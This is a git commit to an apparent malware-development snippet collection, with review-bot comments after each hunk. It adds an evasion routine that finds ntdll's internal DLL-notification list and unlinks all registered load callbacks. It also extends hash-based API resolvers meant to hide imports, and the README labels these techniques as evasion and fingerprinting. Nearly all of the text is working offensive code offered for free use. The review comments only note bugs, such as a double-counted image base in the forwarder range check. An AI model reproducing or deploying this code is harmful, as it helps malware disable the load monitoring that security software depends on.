2.0.477
This commit is contained in:
vxunderground 2022-12-16 12:45:05 -06:00
parent 9c1c612c73
commit d8e545407d
17 changed files with 315 additions and 16 deletions


@ -81,6 +81,7 @@ You're free to use this in any manner you please. You do not need to use this en
| HookEngineRestoreHeapFree | rad9800 | Evasion |
| HookEngineUnhookHeapFree | rad9800 | Evasion |
| SleepObfuscationViaVirtualProtect | 5pider | Evasion |
| RemoveRegisterDllNotification | Rad98, Peter Winter-Smith | Evasion |
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
@ -180,8 +181,6 @@ You're free to use this in any manner you please. You do not need to use this en
| IcmpSendEcho2Ex | N/A | N/A |
| WQL Win32_Ping | Martin Friedrich | N/A |
| Process Injection | N/A | N/A |
| More String Manipulation code | N/A | Continuous Improvement |
| More hashing algorithms | N/A | Continuous Improvement |
# Notes
| Function Name | Note | Fixed |


@ -33,6 +33,8 @@ typedef NTSTATUS(NTAPI* RTLREGISTERWAIT)(PHANDLE, HANDLE, WORKERCALLBACKFUNC, PV
typedef NTSTATUS(NTAPI* RTLDEREGISTERWAITEX)(HANDLE, HANDLE);
typedef NTSTATUS(NTAPI* NTCONTINUE)(PCONTEXT, BOOL);
typedef NTSTATUS(NTAPI* LDRGETPROCEDUREADDRESS)(HMODULE, PANSI_STRING, WORD, PVOID);
typedef NTSTATUS(NTAPI* LDRREGISTERDLLNOTIFICATION)(ULONG, LDR_DLL_NOTIFICATION_FUNCTION*, PVOID, PVOID);
typedef NTSTATUS(NTAPI* LDRUNREGISTERDLLNOTIFICATION)(PVOID);
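Review bot: `LDRREGISTERDLLNOTIFICATION` declares its callback parameter as `LDR_DLL_NOTIFICATION_FUNCTION*`, but that typedef (added to Internal.h in this same commit) already carries the `CALLBACK*`, so the parameter is a pointer to a function pointer and the registration site has to cast the routine to make it compile. Declare it as the function-pointer type itself and take the cookie as an out-pointer, `typedef NTSTATUS(NTAPI* LDRREGISTERDLLNOTIFICATION)(ULONG, LDR_DLL_NOTIFICATION_FUNCTION, PVOID, PVOID*);` — renaming the typedef to `PLDR_DLL_NOTIFICATION_FUNCTION`, the name Microsoft's documentation appears to use, would make the pointer-ness visible at a glance. Both new typedefs would benefit from a one-line comment naming the ntdll exports they mirror (`// ntdll!LdrRegisterDllNotification / LdrUnregisterDllNotification`), since the surrounding typedef list gives no hint which of these are loader APIs.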


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _
DWORD dwFunctionHash = HashStringFowlerNollVoVariant1aA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
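Review bot: The forwarder test's upper bound on the line `FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` adds ModuleBase a second time, so the bound sits roughly one image base above the export directory and any export whose address is at or past the start of the export directory is treated as a forwarder and sent through LdrGetProcedureAddress instead of being returned directly. It should read `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size`, and `IMAGE_DIRECTORY_ENTRY_EXPORT` would be clearer than the bare index 0. `LdrGetProcedureAddress` is assigned from `LdrLoadGetProcedureAddress()` in the earlier hunk and is invoked here without a NULL check, so a failed lookup dereferences NULL; add `if (LdrGetProcedureAddress == NULL) return 0;` before the call. The function header and the export-table walk lie outside this hunk.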


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase,
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase,
DWORD dwFunctionHash = HashStringJenkinsOneAtATime32BitA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
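Review bot: The range check that decides whether the export is a forwarder is wrong on its upper end: `(ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` includes ModuleBase twice, so the end of the export directory is computed about one image base too high and every export at or beyond the directory's start is misclassified as a forwarder. Replace it with `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size`. Note also that the forwarder branch resolves the original `pFunctionName` through `LdrGetProcedureAddress` rather than parsing the forwarder string, which presumably routes the lookup back through the loader this hash-based resolver exists to avoid — worth a comment if that is the intended trade-off. `LdrGetProcedureAddress` itself is never checked for NULL before the call. The function's opening lines and the export-table iteration are outside the hunk.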


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 H
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 H
DWORD dwFunctionHash = HashStringLoseLoseA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
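Review bot: The upper bound of the forwarder check double-counts the image base: `(ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` evaluates to the export directory start plus ModuleBase plus Size, so exports located after the export directory begins are all treated as forwarders and resolved via LdrGetProcedureAddress. The correct bound is `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size`. `ForwardFunctionString.Length` is a USHORT and is assigned the raw result of `StringLengthA` with no narrowing check; an explicit `(USHORT)` cast plus a length guard would make the assumption visible. `LdrGetProcedureAddress` is obtained from `LdrLoadGetProcedureAddress()` above and should be NULL-checked before it is invoked. The function start and the export walk are outside this hunk.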


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
DWORD dwFunctionHash = HashStringMurmurA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
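Review bot: The forwarder range test's upper bound `(ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` adds ModuleBase twice, so the check accepts any address from the export directory start up to roughly twice the image base and misclassifies ordinary exports placed after the export directory as forwarders. Use `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size` (with `IMAGE_DIRECTORY_ENTRY_EXPORT` in place of the magic 0). `LdrGetProcedureAddress` comes from `LdrLoadGetProcedureAddress()` in the earlier hunk and is called here without a NULL check; `if (LdrGetProcedureAddress == NULL) return 0;` before the call closes that. The function header and the export-table loop are outside the hunk.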


@ -7,6 +7,12 @@ DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +27,21 @@ DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
DWORD dwFunctionHash = HashStringRotr32A((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
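Review bot: On the line `FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` the image base is added to both halves, so the end-of-export-directory bound is about one ModuleBase too large and every export whose address is at or above the directory start takes the forwarder path through LdrGetProcedureAddress. The intended bound is `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size`. The forwarder branch also passes the original `pFunctionName` to `LdrGetProcedureAddress` rather than the forwarder target, which presumably re-enters the loader's own name resolution — add a comment if that is deliberate. `LdrGetProcedureAddress` is not NULL-checked before use. The function's start and the export iteration lie outside this hunk.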


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
DWORD dwFunctionHash = HashStringSdbmA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
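Review bot: The forwarder bound `(ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` counts ModuleBase twice, which pushes the upper limit roughly one image base past the export directory, so exports that happen to sit after the directory start are treated as forwarders and resolved through LdrGetProcedureAddress instead of being returned directly. Write it as `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size` and prefer `IMAGE_DIRECTORY_ENTRY_EXPORT` over the bare 0. `LdrGetProcedureAddress`, fetched via `LdrLoadGetProcedureAddress()` in the earlier hunk, is invoked without a NULL check. The function header and export-table walk are outside this hunk.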


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Ha
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Ha
DWORD dwFunctionHash = HashStringSipHashA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
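Review bot: The forwarder range check has a wrong upper bound: `(ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` includes ModuleBase on both sides of the `+`, so the test passes for any export at or beyond the export directory start and those are needlessly routed through LdrGetProcedureAddress. It should be `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size`. `ForwardFunctionString.Length` (a USHORT) takes the unchecked result of `StringLengthA`; a `(USHORT)` cast and a length guard would make that narrowing explicit. `LdrGetProcedureAddress` should be NULL-checked before the call, since `LdrLoadGetProcedureAddress()` in the earlier hunk can presumably fail. The function's opening and the export loop are outside the hunk.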


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWOR
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWOR
DWORD dwFunctionHash = HashStringSuperFastHashA((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
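Review bot: The line `FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` adds ModuleBase a second time, so the upper edge of the export directory is computed about one image base too high and ordinary exports placed after the directory start are misdetected as forwarders. Use `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size`. `LdrGetProcedureAddress` is assigned from `LdrLoadGetProcedureAddress()` in the earlier hunk and dereferenced here without a NULL check; guard with `if (LdrGetProcedureAddress == NULL) return 0;`. The function header and the export-table walk are outside this hunk.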


@ -7,6 +7,11 @@ DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
LDRGETPROCEDUREADDRESS LdrGetProcedureAddress = NULL;
DWORD64 FunctionAddress = ERROR_SUCCESS;
ANSI_STRING ForwardFunctionString = { 0 };
LdrGetProcedureAddress = (LDRGETPROCEDUREADDRESS)LdrLoadGetProcedureAddress();
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ModuleBase);
@ -21,7 +26,21 @@ DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In
DWORD dwFunctionHash = HashStringUnknownGenericHash1A((PCHAR)pFunctionName);
if (Hash == dwFunctionHash)
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
{
FunctionAddress = (DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]];
if (FunctionAddress >= (ModuleBase + Optional->DataDirectory[0].VirtualAddress) &&
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
return 0;
}
return FunctionAddress;
}
}
return 0;
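Review bot: The forwarder test's upper bound `(ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size)` double-counts ModuleBase, so the check accepts addresses up to roughly twice the image base and any export at or past the export directory start is sent through LdrGetProcedureAddress rather than returned directly. The bound should be `FunctionAddress < ModuleBase + Optional->DataDirectory[0].VirtualAddress + Optional->DataDirectory[0].Size`, with `IMAGE_DIRECTORY_ENTRY_EXPORT` replacing the magic 0. `LdrGetProcedureAddress` is called without a NULL check even though it is obtained from a lookup that can presumably fail. The function's opening lines and the export-table iteration are outside the hunk.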


@ -1131,3 +1131,27 @@ typedef struct AMBIGUOUS_STRING {
DWORD MaximumLength;
PUCHAR Buffer;
}AB_STRING, * PAB_STRING;
typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
ULONG Flags;
PUNICODE_STRING FullDllName;
PUNICODE_STRING BaseDllName;
PVOID DllBase;
ULONG SizeOfImage;
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;
typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
ULONG Flags;
PUNICODE_STRING FullDllName;
PUNICODE_STRING BaseDllName;
PVOID DllBase;
ULONG SizeOfImage;
} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;
typedef union _LDR_DLL_NOTIFICATION_DATA {
LDR_DLL_LOADED_NOTIFICATION_DATA Loaded;
LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;
typedef VOID(CALLBACK* LDR_DLL_NOTIFICATION_FUNCTION)(ULONG, CONST PLDR_DLL_NOTIFICATION_DATA, PVOID);
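Review bot: The new structure block has no comment saying what it mirrors, and since `LDR_DLL_LOADED_NOTIFICATION_DATA` and `LDR_DLL_UNLOADED_NOTIFICATION_DATA` are field-for-field identical a future reader will be tempted to collapse them; a one-line note such as `// Mirrors the documented ntdll LdrRegisterDllNotification structures; Loaded/Unloaded are intentionally identical` would prevent that. The callback typedef `LDR_DLL_NOTIFICATION_FUNCTION` already includes the `CALLBACK*`, so it is a pointer type despite lacking the `P` prefix the rest of this header uses for pointer typedefs (`PAB_STRING`, `PLDR_DLL_NOTIFICATION_DATA`); either rename it `PLDR_DLL_NOTIFICATION_FUNCTION` or add a comment stating it is a function-pointer type so callers do not take its address again.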


@ -37,11 +37,6 @@ int main(VOID)
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
//hasha(NtMapViewOfSection);
UCHAR KeyBuf[17] = { 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x00};
SleepObfuscationViaVirtualProtect(4000, KeyBuf);
return dwError;
}


@ -0,0 +1,102 @@
#include "Win32Helper.h"
VOID DllLoadCallbackRoutine(ULONG NotificationReason, PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
}
PLIST_ENTRY UnusedSubroutineGetDllNotification(VOID)
{
LDRREGISTERDLLNOTIFICATION LdrRegisterDllNotification = NULL;
LDRUNREGISTERDLLNOTIFICATION LdrUnregisterDllNotification = NULL;
PVOID Cookie = NULL;
HMODULE hNtdll = NULL; PBYTE pbNtdll = NULL;;
PLIST_ENTRY LdrDllNotificationList = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
if (hNtdll == NULL)
return NULL;
else
pbNtdll = (PBYTE)hNtdll;
LdrRegisterDllNotification = (LDRREGISTERDLLNOTIFICATION)GetProcAddressA((DWORD64)hNtdll, "LdrRegisterDllNotification");
LdrUnregisterDllNotification = (LDRUNREGISTERDLLNOTIFICATION)GetProcAddressA((DWORD64)hNtdll, "LdrUnregisterDllNotification");
if (!LdrRegisterDllNotification || !LdrUnregisterDllNotification)
return NULL;
if (LdrRegisterDllNotification(0, (LDR_DLL_NOTIFICATION_FUNCTION*)DllLoadCallbackRoutine, NULL, &Cookie) != STATUS_SUCCESS)
return NULL;
else
LdrDllNotificationList = (PLIST_ENTRY)Cookie;
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &pbNtdll);
Section = IMAGE_FIRST_SECTION(Nt);
for (DWORD dwX = ERROR_SUCCESS; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA(".data", (PCHAR)Section->Name) == ERROR_SUCCESS)
{
PLIST_ENTRY LdrDllNotificationListNext = NULL;
PVOID BaseAddress = NULL, BaseAddressEnd = NULL;
BaseAddress = pbNtdll + Section->VirtualAddress;
BaseAddressEnd = (PVOID)((PULONG)BaseAddress + Section->Misc.VirtualSize);
LdrDllNotificationListNext = LdrDllNotificationList->Flink;
while (LdrDllNotificationListNext != LdrDllNotificationList)
{
if (LdrDllNotificationListNext >= BaseAddress && LdrDllNotificationListNext <= BaseAddressEnd)
{
if (LdrUnregisterDllNotification(Cookie) != STATUS_SUCCESS)
return NULL;
else
return LdrDllNotificationListNext;
}
LdrDllNotificationListNext = LdrDllNotificationListNext->Flink;
}
}
Section++;
}
return NULL;
}
BOOL RemoveRegisterDllNotification(VOID)
{
PLIST_ENTRY DllNotifictionList = NULL;
PLIST_ENTRY Head = NULL, Next = NULL;
DllNotifictionList = UnusedSubroutineGetDllNotification();
if (DllNotifictionList == NULL)
return FALSE;
Head = DllNotifictionList;
Next = DllNotifictionList->Flink;
while (Next != Head)
{
PLIST_ENTRY PreviousFlink = NULL, PreviousBlink = NULL;
PreviousFlink = Next->Flink;
PreviousBlink = Next->Blink;
PreviousFlink->Blink = PreviousBlink;
PreviousBlink->Flink = PreviousFlink;
Next->Flink = NULL;
Next->Blink = NULL;
Next = PreviousFlink;
}
return TRUE;
}
